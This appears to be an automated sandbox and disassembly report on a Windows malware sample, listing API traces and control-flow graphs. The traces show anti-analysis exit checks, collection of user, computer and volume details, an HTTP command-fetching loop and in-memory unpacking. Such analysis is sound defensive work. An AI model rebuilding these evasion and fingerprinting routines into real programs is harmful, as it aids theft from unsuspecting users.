                                                • LoadLibraryA.KERNEL32(008C8BF0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                                • LoadLibraryA.KERNEL32(008C8C38,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                                • LoadLibraryA.KERNEL32(008C8B30,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                                • LoadLibraryA.KERNEL32(008C8CE0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                                • GetProcAddress.KERNEL32(751E0000,00896DC8), ref: 0041A0DA
                                                • GetProcAddress.KERNEL32(751E0000,008C8C50), ref: 0041A0F2
                                                • GetProcAddress.KERNEL32(751E0000,00899A40), ref: 0041A10A
                                                • GetProcAddress.KERNEL32(751E0000,008C8C68), ref: 0041A123
                                                • GetProcAddress.KERNEL32(751E0000,00896CA8), ref: 0041A13B
                                                • GetProcAddress.KERNEL32(700F0000,00894E78), ref: 0041A160
                                                • GetProcAddress.KERNEL32(700F0000,00896AE8), ref: 0041A179
                                                • GetProcAddress.KERNEL32(700F0000,00894C98), ref: 0041A191
                                                • GetProcAddress.KERNEL32(700F0000,008C8B60), ref: 0041A1A9
                                                • GetProcAddress.KERNEL32(700F0000,008C8A88), ref: 0041A1C2
                                                • GetProcAddress.KERNEL32(700F0000,00896A08), ref: 0041A1DA
                                                • GetProcAddress.KERNEL32(700F0000,00896B48), ref: 0041A1F2
                                                • GetProcAddress.KERNEL32(700F0000,008C8C80), ref: 0041A20B
                                                • GetProcAddress.KERNEL32(753A0000,00896C68), ref: 0041A22C
                                                • GetProcAddress.KERNEL32(753A0000,00896968), ref: 0041A244
                                                • GetProcAddress.KERNEL32(753A0000,008C8CB0), ref: 0041A25D
                                                • GetProcAddress.KERNEL32(753A0000,008C8CC8), ref: 0041A275
                                                • GetProcAddress.KERNEL32(753A0000,00896BA8), ref: 0041A28D
                                                • GetProcAddress.KERNEL32(76310000,00894E00), ref: 0041A2B3
                                                • GetProcAddress.KERNEL32(76310000,00894CC0), ref: 0041A2CB
                                                • GetProcAddress.KERNEL32(76310000,008C8CF8), ref: 0041A2E3
                                                • GetProcAddress.KERNEL32(76310000,00896B08), ref: 0041A2FC
                                                • GetProcAddress.KERNEL32(76310000,008969E8), ref: 0041A314
                                                • GetProcAddress.KERNEL32(76310000,00894CE8), ref: 0041A32C
                                                • GetProcAddress.KERNEL32(76910000,008C8A10), ref: 0041A352
                                                • GetProcAddress.KERNEL32(76910000,00896B28), ref: 0041A36A
                                                • GetProcAddress.KERNEL32(76910000,00899AD0), ref: 0041A382
                                                • GetProcAddress.KERNEL32(76910000,008C8AA0), ref: 0041A39B
                                                • GetProcAddress.KERNEL32(76910000,008C8A28), ref: 0041A3B3
                                                • GetProcAddress.KERNEL32(76910000,00896C88), ref: 0041A3CB
                                                • GetProcAddress.KERNEL32(76910000,00896BE8), ref: 0041A3E4
                                                • GetProcAddress.KERNEL32(76910000,008C8D28), ref: 0041A3FC
                                                • GetProcAddress.KERNEL32(76910000,008C8D70), ref: 0041A414
                                                • GetProcAddress.KERNEL32(75B30000,00896A28), ref: 0041A436
                                                • GetProcAddress.KERNEL32(75B30000,008C8DA0), ref: 0041A44E
                                                • GetProcAddress.KERNEL32(75B30000,008C8DD0), ref: 0041A466
                                                • GetProcAddress.KERNEL32(75B30000,008C8D40), ref: 0041A47F
                                                • GetProcAddress.KERNEL32(75B30000,008C8D88), ref: 0041A497
                                                • GetProcAddress.KERNEL32(75670000,00896B88), ref: 0041A4B8
                                                • GetProcAddress.KERNEL32(75670000,00896A68), ref: 0041A4D1
                                                • GetProcAddress.KERNEL32(76AC0000,00896CC8), ref: 0041A4F2
                                                • GetProcAddress.KERNEL32(76AC0000,008C8D58), ref: 0041A50A
                                                • GetProcAddress.KERNEL32(6F4E0000,008968E8), ref: 0041A530
                                                • GetProcAddress.KERNEL32(6F4E0000,00896908), ref: 0041A548
                                                • GetProcAddress.KERNEL32(6F4E0000,00896988), ref: 0041A560
                                                • GetProcAddress.KERNEL32(6F4E0000,008C8D10), ref: 0041A579
                                                • GetProcAddress.KERNEL32(6F4E0000,00896C08), ref: 0041A591
                                                • GetProcAddress.KERNEL32(6F4E0000,00896A48), ref: 0041A5A9
                                                • GetProcAddress.KERNEL32(6F4E0000,008969A8), ref: 0041A5C2
                                                • GetProcAddress.KERNEL32(6F4E0000,00896A88), ref: 0041A5DA
                                                • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0041A5F1
                                                • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0041A607
                                                • GetProcAddress.KERNEL32(75AE0000,008C8DB8), ref: 0041A629
                                                • GetProcAddress.KERNEL32(75AE0000,00899AE0), ref: 0041A641
                                                • GetProcAddress.KERNEL32(75AE0000,008C8EA8), ref: 0041A659
                                                • GetProcAddress.KERNEL32(75AE0000,008C9040), ref: 0041A672
                                                • GetProcAddress.KERNEL32(76300000,00896AC8), ref: 0041A693
                                                • GetProcAddress.KERNEL32(6FE40000,008C9100), ref: 0041A6B4
                                                • GetProcAddress.KERNEL32(6FE40000,00896C28), ref: 0041A6CD
                                                • GetProcAddress.KERNEL32(6FE40000,008C8E18), ref: 0041A6E5
                                                • GetProcAddress.KERNEL32(6FE40000,008C9070), ref: 0041A6FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$LibraryLoad
                                                • String ID: HttpQueryInfoA$InternetSetOptionA$P2#v$1#v
                                                • API String ID: 2238633743-3014924196
                                                • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                                • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                                • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1029 406528-40652d 1010->1029 1012 406348-40634c 1011->1012 1013 4064ff-406503 InternetCloseHandle 1011->1013 1015 40635a 1012->1015 1016 40634e-406358 1012->1016 1013->1010 1019 406364-406392 HttpOpenRequestA 1015->1019 1016->1019 1021 4064f5-4064f9 InternetCloseHandle 1019->1021 1022 406398-40639c 1019->1022 1021->1013 1024 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1022->1024 1025 40639e-4063bf InternetSetOptionA 1022->1025 1027 406407-406427 call 41a740 call 41a800 * 2 1024->1027 1028 40642c-40644b call 418940 1024->1028 1025->1024 1027->1029 1035 4064c9-4064e9 call 41a740 call 41a800 * 2 1028->1035 1036 40644d-406454 1028->1036 1035->1029 1039 406456-406480 InternetReadFile 1036->1039 1040 4064c7-4064ef InternetCloseHandle 1036->1040 1044 406482-406489 1039->1044 1045 40648b 1039->1045 1040->1021 1044->1045 1048 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1044->1048 1045->1040 1048->1039
                                                APIs
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                  • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                  • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                • StrCmpCA.SHLWAPI(?,008CAEB0), ref: 00406303
                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                • HttpOpenRequestA.WININET(00000000,GET,?,008CA638,00000000,00000000,00400100,00000000), ref: 00406385
                                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                                • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                                • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                                • InternetCloseHandle.WININET(00000000), ref: 00406503
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                • String ID: ERROR$ERROR$GET
                                                • API String ID: 3074848878-2509457195
                                                • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                                • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                                • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1069 411817-41181a 1067->1069 1070 41199e-4119bd strtok_s 1067->1070 1072 411821-411830 call 41a820 1069->1072 1073 411849-411858 call 41a820 1069->1073 1074 4118ad-4118be StrCmpCA 1069->1074 1075 4118cf-4118e0 StrCmpCA 1069->1075 1076 41198f-411999 call 41a820 1069->1076 1077 4118f1-411902 StrCmpCA 1069->1077 1078 411951-411962 StrCmpCA 1069->1078 1079 411970-411981 StrCmpCA 1069->1079 1080 411913-411924 StrCmpCA 1069->1080 1081 411932-411943 StrCmpCA 1069->1081 1082 411835-411844 call 41a820 1069->1082 1083 41185d-41186e StrCmpCA 1069->1083 1084 41187f-411890 StrCmpCA 1069->1084 1070->1065 1072->1070 1073->1070 1091 4118c0-4118c3 1074->1091 1092 4118ca 1074->1092 1093 4118e2-4118e5 1075->1093 1094 4118ec 1075->1094 1076->1070 1095 411904-411907 1077->1095 1096 41190e 1077->1096 1101 411964-411967 1078->1101 1102 41196e 1078->1102 1104 411983-411986 1079->1104 1105 41198d 1079->1105 1097 411930 1080->1097 1098 411926-411929 1080->1098 1099 411945-411948 1081->1099 1100 41194f 1081->1100 1082->1070 1087 411870-411873 1083->1087 1088 41187a 1083->1088 1089 411892-41189c 1084->1089 1090 41189e-4118a1 1084->1090 1087->1088 1088->1070 1108 4118a8 1089->1108 1090->1108 1091->1092 1092->1070 1093->1094 1094->1070 1095->1096 1096->1070 1097->1070 1098->1097 1099->1100 1100->1070 1101->1102 1102->1070 1104->1105 1105->1070 1108->1070
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcessstrtok_s
                                                • String ID: block
                                                • API String ID: 3407564107-2199623458
                                                • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                                • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                                • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1155 1160 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1160 1161 4156af-4156b6 1155->1161 1159->1155 1291 415ac3-415ac6 1160->1291 1164 4157da-41585f call 41aad0 StrCmpCA 1161->1164 1165 4156bc-4156c3 1161->1165 1184 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1164->1184 1185 415865-41586c 1164->1185 1170 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1165->1170 1171 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1165->1171 1170->1164 1171->1164 1271 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1171->1271 1184->1291 1192 415872-415879 1185->1192 1193 41598f-415a14 call 41aad0 StrCmpCA 1185->1193 1200 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1192->1200 1201 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1192->1201 1222 415a16-415a21 Sleep 1193->1222 1223 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1193->1223 1200->1193 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1200->1296 1201->1193 1222->1127 1223->1291 1271->1164 1296->1193
                                                APIs
                                                  • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00899BA0,?,0042110C,?,00000000), ref: 0041A82B
                                                  • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                  • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                  • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                  • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                  • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                  • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                                • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpylstrlen$Sleepstrtok
                                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                • API String ID: 3630751533-2791005934
                                                • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                                • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                                • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                                • wsprintfA.USER32 ref: 00417640
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                • String ID: :$C$\
                                                • API String ID: 3790021787-3809124531
                                                • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1344 81003c-810047 1345 810049 1344->1345 1346 81004c-810263 call 810a3f call 810e0f call 810d90 VirtualAlloc 1344->1346 1345->1346 1361 810265-810289 call 810a69 1346->1361 1362 81028b-810292 1346->1362 1367 8102ce-8103c2 VirtualProtect call 810cce call 810ce7 1361->1367 1364 8102a1-8102b0 1362->1364 1366 8102b2-8102cc 1364->1366 1364->1367 1366->1364 1373 8103d1-8103e0 1367->1373 1374 8103e2-810437 call 810ce7 1373->1374 1375 810439-8104b8 VirtualFree 1373->1375 1374->1373 1377 8105f4-8105fe 1375->1377 1378 8104be-8104cd 1375->1378 1381 810604-81060d 1377->1381 1382 81077f-810789 1377->1382 1380 8104d3-8104dd 1378->1380 1380->1377 1386 8104e3-810505 LoadLibraryA 1380->1386 1381->1382 1387 810613-810637 1381->1387 1384 8107a6-8107b0 1382->1384 1385 81078b-8107a3 1382->1385 1388 8107b6-8107cb 1384->1388 1389 81086e-8108be LoadLibraryA 1384->1389 1385->1384 1390 810517-810520 1386->1390 1391 810507-810515 1386->1391 1392 81063e-810648 1387->1392 1393 8107d2-8107d5 1388->1393 1397 8108c7-8108f9 1389->1397 1394 810526-810547 1390->1394 1391->1394 1392->1382 1395 81064e-81065a 1392->1395 1398 810824-810833 1393->1398 1399 8107d7-8107e0 1393->1399 1400 81054d-810550 1394->1400 1395->1382 1396 810660-81066a 1395->1396 1403 81067a-810689 1396->1403 1405 810902-81091d 1397->1405 1406 8108fb-810901 1397->1406 1404 810839-81083c 1398->1404 1407 8107e2 1399->1407 1408 8107e4-810822 1399->1408 1401 8105e0-8105ef 1400->1401 1402 810556-81056b 1400->1402 1401->1380 1409 81056d 1402->1409 1410 81056f-81057a 1402->1410 1411 810750-81077a 1403->1411 1412 81068f-8106b2 1403->1412 1404->1389 1413 81083e-810847 1404->1413 1406->1405 1407->1398 1408->1393 1409->1401 1414 81059b-8105bb 1410->1414 1415 81057c-810599 1410->1415 1411->1392 1416 8106b4-8106ed 1412->1416 1417 8106ef-8106fc 1412->1417 1418 810849 1413->1418 1419 81084b-81086c 1413->1419 1427 8105bd-8105db 1414->1427 1415->1427 1416->1417 1421 81074b 1417->1421 1422 8106fe-810748 1417->1422 1418->1389 1419->1404 1421->1403 1422->1421 1427->1400
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0081024D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: cess$kernel32.dll
                                                • API String ID: 4275171209-1230238691
                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction ID: f6093475901ca60e80cc3f331bc2662dae69c62b94434f60525690b1d0a0d3c1
                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction Fuzzy Hash: 9F526874A012299FDB64CF58C984BA8BBB5BF09304F1480E9E94DAB251DB70AEC4DF15

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898850), ref: 004198A1
                                                  • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898A18), ref: 004198BA
                                                  • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898A00), ref: 004198D2
                                                  • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898A60), ref: 004198EA
                                                  • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898AC0), ref: 00419903
                                                  • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00899A30), ref: 0041991B
                                                  • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00896F88), ref: 00419933
                                                  • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00896E68), ref: 0041994C
                                                  • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898A30), ref: 00419964
                                                  • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898A48), ref: 0041997C
                                                  • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898A90), ref: 00419995
                                                  • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898A78), ref: 004199AD
                                                  • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00896DE8), ref: 004199C5
                                                  • Part of subcall function 00419860: GetProcAddress.KERNEL32(76210000,00898AA8), ref: 004199DE
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                  • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                  • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                  • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                  • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                  • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                  • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                  • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                  • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                  • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                  • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                                • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                  • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                  • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                  • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                  • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                  • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                  • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                  • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
